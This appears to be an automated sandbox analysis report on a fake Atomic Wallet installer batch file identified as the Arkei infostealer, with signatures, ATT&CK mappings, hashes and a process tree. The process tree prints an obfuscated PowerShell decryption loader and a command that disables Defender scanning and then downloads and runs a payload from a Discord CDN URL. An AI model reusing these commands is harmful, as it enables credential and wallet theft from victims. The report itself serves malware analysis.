arkei | 884b3ccd012883b6d74cb4482bd553407c5b53b741d84ce6d87850254f74298f

Analysis

max time kernel
77s
max time network
139s
platform
windows10-2004_x64
resource
win10v2004-20220721-en
resource tags

arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
submitted
02-08-2022 23:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

AtomicWallet-Setup.bat
Size

22KB
MD5

17204bcbc62deab8d5253c0b4d7e87e9
SHA1

c9766e880155869ac3eaad22382db9ec06a92be3
SHA256

884b3ccd012883b6d74cb4482bd553407c5b53b741d84ce6d87850254f74298f
SHA512

e1f58413373a095c1bc3d6eb4e007bb715d26f583c193f3762903cba63fc856e9daec1e3a81474ab8aab487f3ac1e6eba1db1f242e42d33abbedbd61ff3169d6

Score

10^/10

arkei default discovery evasion spyware stealer

Malware Config

Extracted

Family

arkei

Botnet

Default

Signatures

Arkei
Arkei is an infostealer written in C++.
stealer arkei

Blocklisted process makes network request 1 IoCs

flow	pid	Process
24	3472	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
2536	AtomicWallet-Setup.bat.exe
752	statistics.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1158

pid	Process
936	attrib.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	statistics.exe

Loads dropped DLL 2 IoCs

pid	Process
752	statistics.exe
752	statistics.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	statistics.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	statistics.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2188	timeout.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings	Process not Found

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1148	powershell.exe
1148	powershell.exe
2536	AtomicWallet-Setup.bat.exe
2536	AtomicWallet-Setup.bat.exe
3472	powershell.exe
3472	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1148	powershell.exe
Token: SeDebugPrivilege	2536	AtomicWallet-Setup.bat.exe
Token: SeDebugPrivilege	3472	powershell.exe

Suspicious use of WriteProcessMemory 29 IoCs

description	pid	Process	procid_target
PID 1948 wrote to memory of 1148	1948	cmd.exe	84
PID 1948 wrote to memory of 1148	1948	cmd.exe	84
PID 1148 wrote to memory of 1680	1148	Process not Found	85
PID 1148 wrote to memory of 1680	1148	Process not Found	85
PID 1680 wrote to memory of 1208	1680	cmd.exe	87
PID 1680 wrote to memory of 1208	1680	cmd.exe	87
PID 1680 wrote to memory of 3376	1680	cmd.exe	88
PID 1680 wrote to memory of 3376	1680	cmd.exe	88
PID 1680 wrote to memory of 936	1680	cmd.exe	89
PID 1680 wrote to memory of 936	1680	cmd.exe	89
PID 1680 wrote to memory of 2536	1680	cmd.exe	90
PID 1680 wrote to memory of 2536	1680	cmd.exe	90
PID 2536 wrote to memory of 3980	2536	AtomicWallet-Setup.bat.exe	91
PID 2536 wrote to memory of 3980	2536	AtomicWallet-Setup.bat.exe	91
PID 3980 wrote to memory of 692	3980	csc.exe	92
PID 3980 wrote to memory of 692	3980	csc.exe	92
PID 2536 wrote to memory of 3472	2536	AtomicWallet-Setup.bat.exe	93
PID 2536 wrote to memory of 3472	2536	AtomicWallet-Setup.bat.exe	93
PID 1680 wrote to memory of 1432	1680	cmd.exe	96
PID 1680 wrote to memory of 1432	1680	cmd.exe	96
PID 3472 wrote to memory of 752	3472	powershell.exe	99
PID 3472 wrote to memory of 752	3472	powershell.exe	99
PID 3472 wrote to memory of 752	3472	powershell.exe	99
PID 752 wrote to memory of 3112	752	statistics.exe	107
PID 752 wrote to memory of 3112	752	statistics.exe	107
PID 752 wrote to memory of 3112	752	statistics.exe	107
PID 3112 wrote to memory of 2188	3112	cmd.exe	110
PID 3112 wrote to memory of 2188	3112	cmd.exe	110
PID 3112 wrote to memory of 2188	3112	cmd.exe	110

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
936	attrib.exe
1432	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\AtomicWallet-Setup.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1948
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\AtomicWallet-Setup.bat' -ArgumentList 'am_admin'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1148
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\AtomicWallet-Setup.bat" am_admin
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1680
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo F"
      4⤵
      PID:1208
  - - C:\Windows\system32\xcopy.exe
      xcopy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe AtomicWallet-Setup.bat.exe /y
      4⤵
      PID:3376
  - - C:\Windows\system32\attrib.exe
      attrib +s +h AtomicWallet-Setup.bat.exe
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:936
  - - C:\Users\Admin\AppData\Local\Temp\AtomicWallet-Setup.bat.exe
      AtomicWallet-Setup.bat.exe -noprofile -windowstyle hidden -executionpolicy bypass -command $zicZyG = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\AtomicWallet-Setup.bat').Split([Environment]::NewLine);$KvIpRz = $zicZyG[$zicZyG.Length - 1];$nqEVyA = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dXNpbmcgU3lzdGVtLlRleHQ7dXNpbmcgU3lzdGVtLklPO3VzaW5nIFN5c3RlbS5JTy5Db21wcmVzc2lvbjt1c2luZyBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5OyBwdWJsaWMgY2xhc3MgSU5hdmFYIHsgcHVibGljIHN0YXRpYyBieXRlW10gaE9HWUFyKGJ5dGVbXSBpbnB1dCwgYnl0ZVtdIGtleSwgYnl0ZVtdIGl2KSB7IEFlc01hbmFnZWQgYWVzID0gbmV3IEFlc01hbmFnZWQoKTsgYWVzLk1vZGUgPSBDaXBoZXJNb2RlLkNCQzsgYWVzLlBhZGRpbmcgPSBQYWRkaW5nTW9kZS5QS0NTNzsgSUNyeXB0b1RyYW5zZm9ybSBkZWNyeXB0b3IgPSBhZXMuQ3JlYXRlRGVjcnlwdG9yKGtleSwgaXYpOyBieXRlW10gZGVjcnlwdGVkID0gZGVjcnlwdG9yLlRyYW5zZm9ybUZpbmFsQmxvY2soaW5wdXQsIDAsIGlucHV0Lkxlbmd0aCk7IGRlY3J5cHRvci5EaXNwb3NlKCk7IGFlcy5EaXNwb3NlKCk7IHJldHVybiBkZWNyeXB0ZWQ7IH0gcHVibGljIHN0YXRpYyBieXRlW10gZ2JmUVZiKGJ5dGVbXSBieXRlcykgeyBNZW1vcnlTdHJlYW0gbXNpID0gbmV3IE1lbW9yeVN0cmVhbShieXRlcyk7IE1lbW9yeVN0cmVhbSBtc28gPSBuZXcgTWVtb3J5U3RyZWFtKCk7IHZhciBncyA9IG5ldyBHWmlwU3RyZWFtKG1zaSwgQ29tcHJlc3Npb25Nb2RlLkRlY29tcHJlc3MpOyBncy5Db3B5VG8obXNvKTsgZ3MuRGlzcG9zZSgpOyBtc2kuRGlzcG9zZSgpOyBtc28uRGlzcG9zZSgpOyByZXR1cm4gbXNvLlRvQXJyYXkoKTsgfSB9'));Add-Type -TypeDefinition $nqEVyA;[System.Reflection.Assembly]::Load([INavaX]::gbfQVb([INavaX]::hOGYAr([System.Convert]::FromBase64String($KvIpRz), [System.Convert]::FromBase64String('1fXWdSXnAQ0+knTrk1IxqXLqElmFQZxu8O3C1w4kI8k='), [System.Convert]::FromBase64String('idlSmTy8pse2ZfrQ6pO55Q==')))).EntryPoint.Invoke($null, (, [string[]] ('am_admin')))
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2536
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4tiq4lgo\4tiq4lgo.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3980
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES865B.tmp" "c:\Users\Admin\AppData\Local\Temp\4tiq4lgo\CSC8BC6ECB19CD44249BDE38685C1F4573B.TMP"
        6⤵
        
        PID:692
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath C:\ -ExclusionExtension exe ; Add-MpPreference -ExclusionPath C:\ -ExclusionExtension exe ; @('https://cdn.discordapp.com/attachments/867102519430610964/999703636240236564/statistics.exe') | foreach{$fileName = $env:LOCALAPPDATA + '/statistics.exe' ;(New-Object System.Net.WebClient).DownloadFile($_,$fileName);Invoke-Item $fileName}
        5⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3472
      - C:\Users\Admin\AppData\Local\statistics.exe
        
        "C:\Users\Admin\AppData\Local\statistics.exe"
        6⤵
        Executes dropped EXE
        Checks computer location settings
        Loads dropped DLL
        Checks processor information in registry
        Suspicious use of WriteProcessMemory
        
        PID:752
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\statistics.exe" & exit
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:3112
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        8⤵
        Delays execution with timeout.exe
        
        PID:2188
  - - C:\Windows\system32\attrib.exe
      attrib -s -h AtomicWallet-Setup.bat.exe
      4⤵
      Views/modifies file attributes
      PID:1432

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\mozglue.dll

Filesize
133KB

MD5
8f73c08a9660691143661bf7332c3c27

SHA1
37fa65dd737c50fda710fdbde89e51374d0c204a

SHA256
3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

SHA512
0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

Download Submit
C:\ProgramData\nss3.dll

Filesize
1.2MB

MD5
bfac4e3c5908856ba17d41edcd455a51

SHA1
8eec7e888767aa9e4cca8ff246eb2aacb9170428

SHA256
e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

SHA512
2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
63e62e02ee9c90b7adfb2eefe7efa04f

SHA1
9bc1eda86f7f95345c2a3901288b6867447dee6b

SHA256
cbafbcef08446541d49da9d11842ab860628a7d317db15f570b7b1e1048ade11

SHA512
3d2bf16c2a9b42e28dc9d2c18d6d697d3749b14f2f6c708ea9e587022aeb5fbbcffaa49c4f4f994f1cd1f6c886b8d8b6ab3a29d3b65fe0659ea0f2fa9d47ba52

Download Submit
C:\Users\Admin\AppData\Local\Temp\4tiq4lgo\4tiq4lgo.dll

Filesize
3KB

MD5
4c743f63b26dd477e221a80b8bfef119

SHA1
0331f90c92ace598023f517a136574e572f690a8

SHA256
8d247996402e72077f76c7459786e2de835bea10f0b9f24940ef4fbffa273314

SHA512
a4e5711bf6149e2ec72c5b2db5894a3c74ab9111d285425b8a5ec1ae4487d14c4a5d1ee6441625624051e6064ff653f77c44b089be0dc0bd29813a3a01a8a4e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\AtomicWallet-Setup.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\AtomicWallet-Setup.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES865B.tmp

Filesize
1KB

MD5
7ead443cdb5788d050db82157609c210

SHA1
d150495976d005e4b36ae3324baf34170d157eb0

SHA256
c7701e129b47a2f5643c43dd916f03bb5e086e3f82a51a50f4b0f95b8def39b6

SHA512
2baa2469717c7ff5811b38a80f4df2f0e89ea7b94191b8bc79e2d9d102193d5e9f0753b0279d16cc745f443698cf4e8cd9e0d8d57421224800782cc2c9aec5f4

Download Submit
C:\Users\Admin\AppData\Local\statistics.exe

Filesize
171KB

MD5
10f0d3a64949a6e15a9c389059a8f379

SHA1
0f6e3442c67d6688fae5f51b4f60b78cd05f30df

SHA256
10afe233525aaf99064e4e444f11a8fc01f8b9f508e4f123fd76b314a6d360f9

SHA512
40b19007433518aba9c19c9fdae314112a73f50ab0dcf9356a1887b44bcdbadf767be1eb0f2d4c1ba249c8791473c55e0d9f12daaed9356bf560e14d3e473c60

Download Submit
C:\Users\Admin\AppData\Local\statistics.exe

Filesize
171KB

MD5
10f0d3a64949a6e15a9c389059a8f379

SHA1
0f6e3442c67d6688fae5f51b4f60b78cd05f30df

SHA256
10afe233525aaf99064e4e444f11a8fc01f8b9f508e4f123fd76b314a6d360f9

SHA512
40b19007433518aba9c19c9fdae314112a73f50ab0dcf9356a1887b44bcdbadf767be1eb0f2d4c1ba249c8791473c55e0d9f12daaed9356bf560e14d3e473c60

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4tiq4lgo\4tiq4lgo.0.cs

Filesize
744B

MD5
a94bf575020eda73efcd96205c058132

SHA1
008feaf3bccc3650bfd729ba5703ffb4c0facb89

SHA256
3d8561f5136363538e332a9a693128d56cf886af5b2cebf6d3ac8e0843e3123b

SHA512
96ed071d1cafbb6d80aa5ef24ede28b5e03c36caed7c44dc3f5c6c0340429b1e361fd6e9a9bf4033104fbef843a4b4ba03dadc3ddc28338937b72e3272fd6297

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4tiq4lgo\4tiq4lgo.cmdline

Filesize
369B

MD5
afee1c977a626cd2235ab154466333a5

SHA1
71c61320d05da9db39f68c0909591388daa0de3a

SHA256
ca75867f1b5b5a93827004dd807641a436f09dabaac750111d4821f9c29c91c0

SHA512
6423f670fb2e8692f68a210075b690e8b5ba697fefe31582207129612f9d6f69082165d0d232844112523ca04d5921f7917370c2f88d9a9911ffa848bcea2355

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4tiq4lgo\CSC8BC6ECB19CD44249BDE38685C1F4573B.TMP

Filesize
652B

MD5
b2597f1a588e151fe90625ed1ce305bf

SHA1
2e08c366229366a6e9bb185bf977796176cfd2c4

SHA256
cae3a83c8e186949a69f09555ef5dd71eb9e0511f8466e57085819c5709f5425

SHA512
b578e5422ffeb4823b6677e424afb0636dcd1bae02d7504a644ab25fc3877ca2b46fc2e0deb551d062e361410ae81823d48818e2d2dd71063c1f6b25ecd565c5

Download Submit
memory/752-159-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/752-182-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/752-160-0x0000000060900000-0x0000000060992000-memory.dmp

Filesize
584KB

Download
memory/1148-135-0x00007FFF73C20000-0x00007FFF746E1000-memory.dmp

Filesize
10.8MB

Download
memory/1148-131-0x000002901C340000-0x000002901C362000-memory.dmp

Filesize
136KB

Download
memory/2536-151-0x00007FFF73910000-0x00007FFF743D1000-memory.dmp

Filesize
10.8MB

Download
memory/2536-141-0x00007FFF73910000-0x00007FFF743D1000-memory.dmp

Filesize
10.8MB

Download
memory/3472-152-0x00007FFF73910000-0x00007FFF743D1000-memory.dmp

Filesize
10.8MB

Download
memory/3472-158-0x00007FFF73910000-0x00007FFF743D1000-memory.dmp

Filesize
10.8MB

Download